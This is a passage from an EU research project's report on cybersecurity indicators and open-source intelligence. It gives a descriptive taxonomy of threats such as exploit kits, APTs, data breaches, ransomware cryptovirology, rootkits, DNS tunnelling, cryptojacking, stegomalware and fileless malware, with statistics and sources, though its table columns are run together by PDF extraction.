47 Ransomware - 2017 https://www.symantec.com/security-center/threat-report 48 Cryptocurrencies and ransomware - 2018 - https://www.bloomberg.com/news/articles/2018-01-02/criminal- underworld-is-dropping-bitcoin-for-another-currency 49 Massive cyber-attack could cost Nurofen and Durex maker £100m - 07 2017 - https://www.theguardian.com/business/2017/jul/06/cyber-attack-nurofen-durex-reckitt-benckiser-petya- ransomware 50 Moller-Maersk puts cost of cyber attack at up to $300m https://www.ft.com/content/a44ede7c-825f-11e7-a4ce- 15b2513cb3ff 51 Ransomware - 2017 - https://blog.sonicwall.com/tag/ransomware/ 52 Common IT Tools are the Hacker's Favorites - 04 2018 - https://www.infosecurity-magazine.com/opinions/it-tools- hackers-favorites/ 53 Google Warns Ransomware Boom Scored Crooks $2 Million A Month https://www.forbes.com/sites/thomasbrewster/2017/07/25/google-ransomware-multi-million-dollar-business-with- locky-and-cerber/#cbfbf5d6cafa Copyright SAINT Consortium. All rights reserved. 44 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

attack vulnerabilities in both in malvertising and ● Angler mastermind behind the systems so they can compromised websites Delivered threats to Blackhole exploit kit, distribute malware or campaigns. Its primary visitors of “The which first appeared in perform other malicious payloads are Independent” 2010. By the time he activities. Exploit kits are ransomware (Cerber newspaper after it was was arrested in 2013, he packaged with exploits and CryptoShield). hacked. had more than 1,000 that can target customers and was commonly installed Citadel (emerged 2012) ● CryptoWall, estimated to be earning software such as Adobe is still regarded the TeslaCrypt, around $50,000 per Flash, Java, Microsoft state-of-the-art toolkit CryptoLocker month. He was offering Silverlight. to both distribute ransomware and obtaining zero-day malware and manage Integrated the Pawn vulnerabilities up to infected computers Storm Flash exploit $200,000. The “Cool (bots). Citadel is an Launched a massive exploit kit”, marketed as offspring of the popular malvertising a “premium” product Zeus crimekit whose campaign on high- and cost more, but main goal is to steal profile Japanese came with more banking credentials by sites effective capturing keystrokes ● Integrated Hacking vulnerabilities”. and taking screenshots Team Flash zero-day videos of victims’ flaw During 2016, Symantec computers. Infected PoS saw a 60 percent systems decrease in exploit kit Delivered macro detections, but this through the banking market has grown again malware VAWTRAK in 2018 with the ● Included in a availability of RIG54. massive malvertising campaign, like the BEDEP malware campaign, on top sites Dropped the DRIDEX malware Delivered the CryptXXX ransomware Hid traffic by using the Diffie-Hellman key exchange protocol ● BlackHole Spread Zeus P2P variant “Gameover” banking trojan

● Magnitude Linked to malicious ads

54 A short history of the exploit kit - 09 2017 - https://medium.com/threat-intel/exploit-kits-cybersecurity-3ca6283b Copyright SAINT Consortium. All rights reserved. 45 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

on Yahoo sites Exploited a patched Adobe Flash player flaw Delivered CryptoWall ransomware Delivered Cerber ransomware

6.8.1 Crimeware Crimeware is any computer program or set of programs designed expressly to facilitate illegal activity online. Many spyware programs, browser hijackers, and keyloggers can be considered crimeware if designed and used for illicit activity. One common type of crimeware is the phishing kit, a collection of tools assembled to make it easier for people with little technical skill to launch a phishing exploit. A phishing kit typically includes Web site development software, complete with graphics, coding, and content that can be used to create convincing imitations of legitimate sites, and spam software to automate the mass mailing campaigns. Phishing kits and other types of crimeware are readily available on the Internet. 6.8.2 Cybercrime as a service Purchasing cybercrime-as-a-service tools for threats such as malware and DDoS is no longer just something for low level or aspiring hackers. Organised criminal gangs are taking advantage of these services as the underground criminal landscape continues to become more professionalised and mature. Typical examples of this are ransomware kit and botnet rental services.

6.9 APT (Advanced Persistent Threats)

Nomenclature Examples Usage Metrics

Advanced Persistent • Stuxnet Worm (2010) APT was traditionally On average, it takes Threats (APTs) are • APT10 associated with 240 days to detect an stealthy operations (Scanbox,Sogu,Poison nation-state APT-related that infiltrate/and or Ivy,PlugX) sponsorship, but enterprise exfiltrate valuable • APT28 (or Fancy more recently it has cybersecurity data via unauthorized Bear) been used for breach55. access to a network • Deep Panda targeting Managed Over the course of and remain • Equation Service Providers four years, it was undetected for long • OilRig (MSPs) and sensitive alleged that more periods. An APT has a • 2018:Intrusion Set: client data. than 31 terabytes of longer and more APT32 , data--about 15 billion complex lifecycle • Intrusion Set: APT33 pages was exfiltrated than other kinds of • Intrusion Set: APT34 from 140 American attacks. universities, 30 U.S. • APT35 aka Intrusion companies and five Set: Charming Kitten . government agencies

55 https://techbeacon.com/enterprise-it/counter-security-threats-machine-learning-real-time-data-analytics Copyright SAINT Consortium. All rights reserved. 46 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

and 176 universities abroad. The stolen information, including academic research in technology, medicine and other sciences, is valued at $3.4 billion56

Figure 6.3: Lifecycle of Advanced Persistent Threats (APT)57

56 https://eu.usatoday.com/story/news/politics/2018/03/23/nine-iranians-charged-massive-cyber-theft-campaign- targeting-universities-justice-says/452327002/ 57 https://www.varonis.com/blog/advanced-persistent-threat/ Copyright SAINT Consortium. All rights reserved. 47 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

6.10 Data breaches Currently, by the use of open source methods, there is an estimated 4,846,841,219 (4.8 billion) web-based user accounts that have been compromised by 259 known or reported data breaches58.

Nomenclature Examples Usage Metrics

A data breach is an The top 5 biggest data Primarily a data breach 91.6 percent, “Theft of incident wherein breaches recorded - Jan is used to: Data” continues to be information is stolen or 201859: the chief cause of data taken from a system ● Yahoo - 2013-14 Gain client / user / breaches in 2016. without the knowledge Impact: 3 billion employee data: ID / There were 1013 data or authorization of the user accounts email addresses, breaches in the U.S. in system’s owner. A small ● Onliner Spambot personal records, credit 2016. By comparison, company or a large accounts - 2017 card information. second place U.K. had organization may suffer Impact: more than just 38 breaches60 a data breach. Stolen 700 million email Also; enterprise / data may involve accounts governmental: records, On average hackers are sensitive, proprietary, or ● Adult Friend Finder intellectual property, within the victim’s confidential information October 2016 intelligence. system, egress (data such as credit card Impact: more than extraction) takes 9-11 numbers, customer 412.2 million Also to note for months. data, trade secrets or accounts enterprise victims - the matters of national ● eBay - May 2014 benefits in terms of Average cost of a data security. Impact: 145 million reduced costs for breach (419 companies users compromised companies of a data /17 industry sectors/ ● Equifax - July 2017 breach: countries - 2017) $3.62 Impact: personal million. information of 143 -$458,000 - having an million consumers; incident response team Average number of 209,000 consumers records in a data breach also had their credit -$385,000 - extensive 24,08961. card data exposed use of encryption ● Heartland Payment Systems March -$193,000 - 2008 participation in threat Impact: 134 million sharing credit cards exposed through SQL injection

58 have i been pwned? - https://haveibeenpwned.com/ 59 Biggest recorded data breaches - 01 2018 - https://www.csoonline.com/article/2130877/data-breach/the-biggest- data-breaches-of-the-21st-century.html 60 Data Breach - 2016 - https://www.symantec.com/security-center/threat-report 61 Data Breach Study 2017, IBM / Ponemon - 2018 - https://www.ibm.com/security/infographics/data-breach/ Copyright SAINT Consortium. All rights reserved. 48 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

6.11 Cyber attacks

Nomenclature Examples Usage Metrics

A cyberattack is Cyberattacks may 4 typical attack vectors: The cyberattack on the deliberate exploitation include the following Equifax credit reporting of computer systems, consequences: ● Asymmetric agency in 2017, which technology-dependent Routing: led to the theft of Social enterprises and ● Identity theft in this method, the Security numbers, birth networks. Cyberattacks ● Fraud attacker attempts to dates, and other data on use malicious code to ● Extortion utilize more than almost half the U.S. alter computer code, ● Malware one route to the population62. logic or data, resulting in ● Pharming targeted network disruptive consequences ● Phishing device. Cyber-attacks and that can compromise ● Spamming ● Buffer Overflow cybercrime damage data and lead to ● Spoofing Attacks: costs to hit $6 trillion cybercrimes, such as ● Spyware this approach annually by 2021. information and identity ● Trojans, viruses, attempts to theft. and worms overwrite specific The cybersecurity ● Stolen hardware, sections of community and major Cyberattack is also such as laptops or computer memory media have largely known as a computer mobile devices within a network. concurred on the network attack (CNA). ● DoS, DDos, and ● Protocol-Specific prediction that DrDos attacks Attacks: cybercrime damages will ● Breach of access when performing cost the world $6 trillion ● Password sniffing network activities, annually by 2021, up ● System infiltration devices obey from $3 trillion in 2015. ● Website specific rules and This represents the defacement procedures. These greatest transfer of ● Private and public protocols—such as economic wealth in Web browser ARP, IP, TCP, UDP, history, risks the exploits ICMP, and various incentives for ● Instant messaging application innovation and abuse protocols—may investment, and will be ● Intellectual property inadvertently leave more profitable than (IP) theft openings for the global trade of all ● Unauthorized access network intrusions major illegal drugs via protocol combined.63 impersonation ("spoofing") or malformed protocol messages. ● Traffic Flooding: an ingenious method of network

62 Six Cyber Threats to Really Worry About in 2018 - 01 2018 - https://www.technologyreview.com/s/609641/six- cyber-threats-to-really-worry-about-in-2018/ 63 Top 5 cybersecurity facts, figures and statistics for 2018 - 01 2018 - https://www.csoonline.com/article/3153707/security/top-5-cybersecurity-facts-figures-and-statistics.html Copyright SAINT Consortium. All rights reserved. 49 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

intrusion simply targets network intrusion detection systems by creating traffic loads too heavy for the system to adequately screen.

6.12 Identity theft

Nomenclature Examples Usage Metrics

Identity theft, also The volume of spam Use in spam campaigns. As of April 2018 known as identity fraud, emails increased 4x in False applications for 4,966,062,037 (4.9 is a crime in which an 2016. loans and credit cards, billion!) email addresses imposter obtains key fraudulent withdrawals / ids are known to be pieces of personally Fake invoice messages from bank accounts, compromised (pwned) identifiable information, are the #1 type of fraudulent use of in data breaches such as email address, phishing lure. telephone calling cards worldwide. 65 passwords, social or online accounts, or security, medical Many people respond (1 obtaining other goods records, driver's license in 131) to "spam", that or privileges which the numbers, passport promises them some criminal might be information, in order to benefit but requests denied if he were to use impersonate someone identifying data, without his real name else, physically or via realizing that in many cyber means (emails, cases, the requester has social media, etc.). no intention of keeping his promise64.

6.13 Cyber espionage

Nomenclature Examples Usage Metrics

Cyber espionage In 2012, European Stuxnet, which was first In 2009, a large spy describes the stealing of security researchers discovered in 2010, is network called secrets or commercially report that a cyber widely believed to have GhostNet arranged an confidential information espionage virus found been used by the US intrusion into more than stored in digital formats on personal computers and Israel to attack 1,000 computers in 103 or on computers and IT in several countries in computer-controlled countries. Perpetrators networks. the Middle East is centrifuges at a uranium got unauthorized access

64 Must-Know Phishing Statistics 2017 - https://blog.barkly.com/phishing-statistics-2017 65 ID theft and self-check - Have I been Pwned - 04 2018 - https://haveibeenpwned.com/ Copyright SAINT Consortium. All rights reserved. 50 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

designed to eavesdrop enrichment facility in to the network of the on financial transactions Iran which disrupted the Dalai Lama offices and and perhaps disable country's nuclear used it for industrial control programme. compromising other systems. computers. Besides, the Similarly, Flame, which attacks were also The surveillance virus, was discovered in 2012, performed on the dubbed Gauss, on PCs in has been implicated in foreign ministers and Lebanon and other an attack on a computer embassies of Germany, countries in the region system at Iran’s main oil Pakistan, India, Iran, appeared to have been export terminal and its South Korea, and developed by the same oil ministry. Thailand. team or ‘factory’ that built the Stuxnet and Analysis of the Gauss Operation Shady RAT, Flame computer viruses. virus has revealed that it the biggest cyber contains multiple espionage example, modules designed to affected more than 70 collect information and companies and send detailed data organizations from 2006 about the infected and is still active. machines back to its Victims included the creators66. International Olympic Committee that was compromised during several months prior to the 2008 Olympic Games in Beijing. The United Nations and the World Anti-Doping Agency were also under the attack. Identified previously unknown malware that was spread via email with a link to a self-loading remote-access tool, or rat. Cyber terrorists got an authorized access to legal contracts, government secrets, and other sensitive data67.

6.13.1 RATs (Remote Access Trojan) A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over

66 Cyber Espionage - 2016 - http://lexicon.ft.com/Term?term=cyber-espionage 67 10 Biggest Cyber Espionage Cases - 2017 - https://securityaffairs.co/wordpress/66617/hacking/cyber-espionage- cases.html Copyright SAINT Consortium. All rights reserved. 51 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies the target computer and is mostly seen as a tool for cyber espionage. RATs are usually downloaded invisibly with a user requested program -- such as a game -- or sent as an email attachment (phishing). Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a botnet. 6.13.2 Cyberterrorism Cyberterrorism is defined as a premeditated attack against a computer system, computer data, programs and other information with the sole aim of violence by clandestine individuals and subnational groups. By international law, if such an attack is by national groups, or nation states, then this is an act of war, not cyberterrorism (see Cyberwarfare below). The main aim behind cyberterrorism is to cause harm and destruction, for political, religious and ideological purposes. 6.13.3 Cyberwarfare Cyberwarfare is computer or network-based conflict involving politically motivated attacks by a nation state on another nation state. In these types of attacks, nation state actors attempt to disrupt the activities of organizations or nation-states, especially for strategic or military purposes and cyber espionage. EU member states have a diplomatic document the “Cyber diplomacy toolbox”. The Council agreed drafting in 2015 and accept in 2017, to develop a framework for a joint EU diplomatic response to malicious cyber activities. Which states serious cyber-attacks by a foreign nation or national group could be construed as an act of war, not to be confused with cyberterrorism. Such activities may constitute wrongful acts under international law and could give rise to a joint EU response. The EU reiterates that states should not knowingly allow their territory to be used for internationally wrongful acts using Information and Communication Technologies (ICT)68. This brings the EU in line with Nato moves in the past establishing cyber as a legitimate military domain, meaning an online attack could theoretically trigger Article 5, the part of its treaty related to collective defence. That states that an attack on one member is an attack on all 29 NATO allies, and a state sponsored attack on one EU state is an attack on all 28 EU members. The Tallinn Manual 2.0 is the most comprehensive analysis of how existing international law applies to cyberspace. “Tallinn Manual on the International Law Applicable to Cyber Warfare”, is an influential resource for legal advisers dealing with cyber issues. The drafting of the Tallinn Manual 2.0 was facilitated and led by the NATO Cooperative Cyber Defence Centre of Excellence69. 6.14 Intrusion (computer)

Nomenclature Examples Usage Metrics

Intrusion is to Computer intrusion is a The act of computer In 2017, 6.5 percent of compromise a computer US federal crime intrusion or gaining people are victims of system by breaking the governed by the unauthorized access to identity fraud via security of such a following laws: a system typically leaves computer intrusion system or causing it to traces that can be resulting in fraudsters enter into an insecure U.S. Code 18 Section discovered by intrusion defrauding people of

68 Cyber attacks: EU ready to respond with a range of measures, including sanctions - 06 2017 - http://www.consilium.europa.eu/en/press/press-releases/2017/06/19/cyber-diplomacy-toolbox/ 69 Tallinn Manual Process - 2013 - https://ccdcoe.org/tallinn-manual.html

state. 1029 – Access Device detection systems. One about $16 billion70. Fraud of the goals of intruders Network intrusion is any U.S. Code 18 Section is to remain undetected unauthorized activity on 1030 – Computer Fraud for as long as possible so a computer network. U.S. Code 18 Section that they can continue 1362 – Communication with their malicious Interference activity undisturbed. U.S. Code 18 Section 2510 – Wire and See also Monitoring Electronic below. Communications Interception and Interception of Oral Communications U.S. Code 18 Section 2701 – Unlawful Access to Stored Communications U.S. Code 18 Section 3121 – Recording of Dialing, Routing, Addressing and Signaling Information 6.14.1 Spyware Spyware is a type of malware (or “malicious software”) that collects and shares information about a computer or network without the user’s consent. It can be installed as a hidden component of genuine software packages or via traditional malware vectors such as deceptive ads, websites, email, instant messages, as well as direct file-sharing connections. 6.14.2 Malvertising Malvertising, or malicious advertising, is the use of online, malicious advertisements to spread malware and compromise systems. Generally, this occurs through the injection of unwanted or malicious code into ads. Malicious actors then pay legitimate online advertising networks to display the infected ads on various websites, exposing every user visiting these sites to the potential risk of infection. Generally, the legitimate advertising networks and websites are not aware they are serving malicious content. 6.14.3 Clickjacking Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top-level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both. 6.14.4 Grayware Grayware is a more succinct name for “potentially unwanted programs.” It’s not a virus and it’s not as obviously malicious as a lot of other problematic codes floating around on the Internet.

70Cyber Security Statistics -02 2018 - https://thebestvpn.com/cyber-security-statistics-2018/ Copyright SAINT Consortium. All rights reserved. 53 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

6.14.5 Backdoors A backdoor is a mean to access a computer system or encrypted data that bypasses the system's customary security mechanisms. A software or web application developer may create a backdoor so that an application or operating system can be accessed for troubleshooting or other purposes. 6.14.6 Adware Adware is the name given to programs that are designed to display advertisements on your computer, redirect your search requests to advertising websites and collect marketing-type data about you – for example, the types of websites that you visit – so that customised adverts can be displayed. In 2016, adware affected around 75 percent of organizations in 13 countries71 6.15 Cryptovirology

Nomenclature Examples Usage Metrics

Cryptovirology is the An example of a virus Cryptovirological Mostly cryptovirology is study of the applications that informs the owner attacks; Traditionally, seen via cryptoviral of cryptography to of the infected machine cryptography and its extortion and by file malicious software. to pay a ransom is the applications are encrypting ransomware virus nicknamed defensive in nature, and (see 4.8 above). Tro_Ransom.A. This provide privacy, virus asks the owner of authentication, and It is a 3-step process: the infected machine to security to users. send $10.99 to a given ● The attacker account through Cryptovirology is used generates a key Western Union. offensively. Primarily pair, and the used to mount corresponding Virus.Win32.Gpcode.ag extortion-based attacks public key is placed is a classic cryptovirus. that cause loss of access in the malware. The This virus partially uses to information, loss of malware is then a version of 660-bit RSA confidentiality, and released to the and encrypts files with information leakage, victim. many different tasks which ● The malware extensions. It instructs cryptography typically generates a random the owner of the prevents. The potential symmetric key and machine to email a threats and attacks that encrypts victim’s given mail ID if the rogue use of files and data with owner desires the cryptography can cause it. Further, the decryptor. If contacted when combined with symmetric key is by email, the user will rogue software (viruses, encrypted using the be asked to pay a Trojan horses) Public- public key in certain amount as key cryptography is malware. It results ransom in return for the essential to the in a small decryptor72. asymmetric

71 Adware - http://www.grouppbs.com/wp-content/uploads/2017/02/Cisco_2017_ACR_PDF.pdf 72 Cryptovirology - Examples of Viruses With Cryptography and Ransom Capabilities - 2015 - http://www.liquisearch.com/cryptovirology/examples_of_viruses_with_cryptography_and_ransom_capabilities

attacks73. ciphertext as well as ciphertext of victim’s data. A message is displayed to the user that includes the asymmetric ciphertext and how to pay the ransom. The victim sends the asymmetric ciphertext along with the payment amount to an attacker. ● The attacker deciphers the asymmetric ciphertext on receiving the payment with their (attacker’s) private key. Now the attacker sends the symmetric key to the victim. The victim interprets the encrypted data thereby completing the crypto virology attack74.

6.16 Malicious software (badware)

Nomenclature Examples Usage Metrics

Badware is a software Bundled installers are a Very common BHOs of Sony's DRM (Digital that fundamentally common way to get the potentially rights management) ignores the user's infected with unsolicited unwanted kind are from Rootkit (Badware): Sony wishes about how to BHOs. These bundles the families BMG Music use his computer or are designed to install Mindspark/Ask Entertainment network connection. It more than the user (toolbars), Browsefox distributed a copy-

73 Cryptovirology: extortion-based security threats and countermeasures - 1996 - https://ieeexplore.ieee.org/document/502676/ 74 Ransomware – A CryptoViral Extortion Attack - 05 2017 - http://www.tothenew.com/blog/ransomware-a- cryptoviral-extortion-attack/ Copyright SAINT Consortium. All rights reserved. 55 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

can include both bargained for and aka Sanbreel (bundled protection scheme with malware (viruses, usually include one or adware), Crossrider music CDs that secretly spyware etc.), or a BHO more BHOs that (bundled adware), and installed a rootkit on (Browser helper object) function as adware Conduit/SearchProtect computers. The Sony that secretly sends and/or hijackers. (hijackers). code modified information about the Windows, a process user to the company, or Lenovo preinstalled called "cloaking". It acts a (non-destructive) Superfish adware on its as spyware, sending software that is installed laptops, which would information about the without the user's inject its own shopping user to Sony. And it knowledge, along with results into the browser can't be removed; trying other software. when you searched on to get rid of it damages Google, Amazon, and Windows. other websites. Superfish is the most Over half a million virulent adware75. computers worldwide are infected. Making this one of the most serious internet epidemics of all time -- on a par with worms like Blaster, Slammer, Code Red and Nimda76.

6.16.1 Rootkits A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence. The term rootkit is a connection of the two words "root" and "kit." Originally, a rootkit was a collection of tools that enabled administrator-level access to a computer or network. Root refers to the Admin account on Unix and Linux systems, and kit refers to the software components that implement the tool. Today rootkits are generally associated with malware – such as Trojans, worms, viruses – that conceal their existence and actions from users and other system processes. 6.16.2 Bootkits A bootkit is similar to a rootkit, so it serves to enable and continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other application. The main difference is that a bootkit infects the boot sequence of the computer. It means that instead of a common rootkit which represents a driver in the system, the code of the bootkit is injected into the master boot record of the hard disk, so that the bootkit is harder to detect because it is executed before the operating system and can control everything.

75 You Had One Job, Lenovo, And it didn’t involve sneaking malicious adware onto your customers’ computers - 02 2015 - http://www.slate.com/articles/technology/bitwise/2015/02/lenovo_superfish_scandal_why_it_s_one_of_the_worst_ consumer_computing_screw.html 76 Sony's DRM Rootkit: The Real Story - 2005 - https://www.schneier.com/blog/archives/2005/11/sonys_drm_rootk.html Copyright SAINT Consortium. All rights reserved. 56 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

6.16.3 Keyloggers A keylogger, sometimes called a keystroke logger or system monitor, is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard. Keylogger software is also available for use on smartphones, such as Apple's iPhone and Android devices. 6.16.4 Software used for illegal purposes 6.16.4.1 Riskware Riskware is the name given to legitimate programs that can cause damage if they are exploited by malicious users in order to delete, block, modify or copy data, and disrupt the performance of computers or networks. 6.16.4.2 Crack A crack (illegal purposes) is commonly applied to the files used in software cracking programs, which enable illegal copying and the use of commercial software, and unauthorized downloading of commercial media (films, videos, music etc,) by breaking (or cracking) various registration and copy-protection techniques. 6.16.4.3 Keygen Keygen refers to password cracking by various measures used to discover computer passwords. This is usually accomplished by recovering passwords from data stored in, or transported from, a computer system. Password cracking is done by either repeatedly guessing the password (brute-force), usually through a computer algorithm in which the computer tries numerous combinations until the password is successfully discovered. Keygen password cracking can be done for several reasons, but the most malicious reason is in order to gain unauthorized access to a computer without the computer owner’s awareness. This results in cybercrime terms of stealing passwords for the purpose of accessing banking information, accessing encrypted documents, protected media etc. 6.17 DNS tunnelling

Nomenclature Examples Usage Metrics

DNS Tunnelling is a Typically, DNS tunnelling Some examples of Not Applicable method of cyber-attack requires the attacks that can use DNS that encodes the data of compromised system to tunnelling include any other programs or have external network type of attack that protocols in DNS queries connectivity, as DNS require firewall evasion and responses. DNS tunnelling requires and command and tunnelling often access to an internal control server. This includes data payloads DNS server with would help the attacker that can be added to an network access. send and receive attacked DNS server and Attackers must also commands against a used to control a control a domain and a computerized system to remote server and server that can act as an send and receive applications. authoritative server in commands bypassing order to execute the the firewall. server-side tunnelling and data payload executable programs.

6.18 Domain abuse

Nomenclature Examples Usage Metrics

Domain abuse is the See Table 5-2: Most Domains obtained and DAAR (Domain Abuse abuse of domain name abused GTLDs used for: spam, Activity Reporting) registration, where the phishing, drive-by system operated by domain is used for malware downloads, ICANN. Is a system for security threatening botnet C&Cs, reporting on domain behaviour across top- malvertising, etc. name registration and level domain (TLD) abuse data registries and registrars. across TLD registries and registrars. Based on legacy and new GTLDs abusive live domains - Oct 2017 (rounded numbers)77:

● Spam - 2,000,000 ● Phishing - 60,000 ● Malware - 72,000 ● Botnets - 18,000

Top Level Domain (TLD) registries which allow registrars to sell high numbers of domains to professional spammers, malware operators, bot herders and in essence aid abuse on the Internet. Some registrars and re-sellers knowingly sell high numbers of domains to these bad actors for profit, and many registries do not do enough to stop or limit this endless supply of domains (see Figure 6.4 below). In defining a TLD "badness" index, Spamhaus used a weight in both these factors. With a certain amount of arbitrariness—and at the same time a desire to avoid excessive complications— TLD defined badness as: ( / ) log ( ) where 𝐷𝐷𝐷𝐷 𝐷𝐷𝐷𝐷 𝐷𝐷𝐷𝐷 Db is the number of bad domains detected Dt is the number of active domains observed

77 ICANN DAAR Report - Oct 2017 - https://www.icann.org/en/system/files/files/presentation-daar-31oct17-en.pdf Copyright SAINT Consortium. All rights reserved. 58 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Figure 6.4: Most abused GTLDs – Jan 2019 78

78 The World's Most Abused TLDs - https://www.spamhaus.org/statistics/tlds/ Copyright SAINT Consortium. All rights reserved. 59 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

7 Indicators - Emerging Threats (Examples) Threat advisories announce new vulnerabilities that can lead to emerging incidents, allied to which use of new or blended technological methods. These are published as soon as possible in order to help anyone better secure their devices or systems. Best practices for cyber security is a hybrid approach. Keeping up with rapid advancements in cyber threats roles that go beyond what is feasible for an in-house security team to provide. The key to awareness and defence / prevention of emerging threats is: CTI - Cyber Threat Intelligence and threat sharing (see section 10 below). According to the Information Security Forum, there are five dominant security threats that businesses need to prepare for in 2019. These include, but are not limited to79: ● Crime-As-A-Service (CaaS) Expands Tools and Services ● The Internet of Things (IoT) Adds Unmanaged Risks ● Supply Chain Remains the Weakest Link in Risk Management ● Regulation Adds to Complexity of Critical Asset Management ● Unmet Board Expectations Exposed by Major Incidents 7.1 Cryptojacking

Nomenclature Examples Usage Metrics

Cryptojacking is the Coinhive with its ready- Cryptojacking can be Cryptojacking is unauthorized use of made scripts needs a file-based or browser- estimated to affect over someone else’s lower skill-set than early based. Used via 10 million web users computer to mine examples. browsers enables even every month. cryptocurrency. Hackers fully patched machines Reseachers built a do this by either getting WannaMine uses the to become victims. behaviour-based the victim to click on a EternalBlue exploit, the Malicious Payloads are detector, CMTracker, to malicious link in an same network spreading injected into automatically track email that loads crypto capabilities as compromised websites. Cryptocurrency Mining mining code on the WannaCry. It’s success is dependent scripts and related computer, or by on the popularity of domains. It successfully infecting a website or Smominru cryptocurrencies. discovered 2,770 unique online ad with cryptojacking samples JavaScript code that from 853,936 popular auto-executes once web pages, including loaded in the victim’s 868 among top 100K in browser. Alexa list 80.

In 30 days a coin-mining botnet can make $30k (browser-based) and $750k (file-based)81.

79 The Top Five Global Cyber Security Threats for 2018 - 01 2018 - https://www.cso.com.au/article/632468/top-five- global-cyber-security-threats-2018/ 80 http://www.cs.ucr.edu/~zhiyunq/pub/ccs18_cryptojacking.pdf 81 https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-cryptojacking-modern- cash-cow-en.pdf Copyright SAINT Consortium. All rights reserved. 60 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

7.2 Stegomalware (Stegware)

Nomenclature Examples Usage Metrics

Stegomalware is a type Recently, stegomalware Stegomalware is now Shamoon malware of malware that uses is used in the following very popular with attacks against Gulf steganography to hinder malware programs and malware writers; state organizations. detection cyber espionage tools: anti-malware tools These attacks occurred (steganography is the generally and perimeter in November 2016 and practice of concealing a ● Microcin (AKA six security tools January 2017. file, message, image, or little monkeys) specifically can do very video within another ● NetTraveler little with payload-filled 4,200 computers were file, message, image, or ● Zberp carriers. Such carriers destroyed at the video). This type of ● Enfal (its new loader are very difficult to headquarters of Saudi malware operates by called Zero.T) detect, as they look like Arabia’s General building a stegosystem ● Shamoon regular image files or Authority of Civil to hide a malicious ● KinS other types of files. Aviation84 component within its ● ZeusVM All steganography resources and then ● Triton (Fibbit) detection programs extracts and executes today are essentially them dynamically. It is In 2016, the Sundown proof-of-concept, and considered one of the exploit kit used PNG their logic cannot be most sophisticated and files to hide exploit code implemented in stealthy ways of using steganography. commercial security obfuscation. But over the past year tools because they are (2017) steganography slow and have fairly low has been used in detection rates.83 malware programs and cyber espionage tools “Stegware” hacking going by the names of tools are now common Microcin, NetTraveler on Dark Web hacker and Invoke-PSImage82. forums – suggesting an uptick of threats used in the wild.

This is a type of malware that uses steganography to hinder detection. This type of malware operates by building a stegosystem to hide a malicious component within its resources and then extracts and executes it dynamically. It is considered one of the most sophisticated and stealthy ways of obfuscation. The concept of Stegomalware was first introduced by researchers in the context of mobile malware and

82 USE OF ‘STEGWARE’ INCREASES IN STEALTH MALWARE ATTACKS - 19 04 2018 - https://threatpost.com/use-of- stegware-increases-in-stealth-malware-attacks/131293/ 83 Steganography in contemporary cyberattacks https://securelist.com/steganography-in-contemporary- cyberattacks/79276/ 84 Shamoon: How the Devastating Malware Was Inserted into Networks https://securityintelligence.com/the-full- shamoon-how-the-devastating-malware-was-inserted-into-networks/

Copyright SAINT Consortium. All rights reserved. 61 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies presented at the Inscrypt conference in 201485. The use of Steganography in malware was first applied to botnets communicating over probabilistically unobservable channels and then extended to other components of malware engineering such as Return Oriented Programming and Compile Time programming, among others. 7.3 Fileless malware attacks

Nomenclature Examples Usage Metrics

Unlike attacks carried Malicious MS office For example, for During 2015, theft out using traditional macros with no distributing the Dridex caused by fileless malware, fileless signature for antivirus banking trojan. malware e.g. Dridex malware attacks don’t software to detect. were estimated at €25 entail attackers million in the United installing software on a Malicious email Kingdom and €15 million victim’s machine. attachments, often in the United States. Instead, tools that are undetectable by anti- built-in to Windows are virus or spam checks By 2015, Dridex attacks hijacked by adversaries were “docm” files (a had been detected in and used to carry out type of Microsoft Word more than 20 countries. attacks. Essentially, MS XML file that executes In early September 2016, Windows is turned macros). Dridex was spotted against itself. targeting cryptocurrency wallets86.

Unlike attacks carried out by using traditional malware, fileless malware attacks don’t entail attackers installing software on a victim’s machine. Instead, tools that are built-in to Windows are hijacked by adversaries and used to carry out attacks. Essentially, Windows is turned against itself. The fact that traditional malware isn’t used is an important point. This means that there’s no signature for antivirus software to detect, greatly decreasing the effectiveness of these programs in detecting fileless malware attacks. And while next-generation security products claim to detect malicious PowerShell activity, the reality is that discovering fileless malware attacks is very challenging.

7.4 Automated threats

Nomenclature Examples Usage Metrics

85 INSCRYPT 2014 The 10th International Conference on Information Security and Cryptology, December 2014, Beijing, China http://www.inscrypt.cn/2014/ 86 Dridex Banking Trojan Will Soon Target Cryptocurrency Wallets - 2016 - http://news.softpedia.com/news/dridex- banking-trojan-will-soon-target-crypto-currency-wallets-508041.shtml

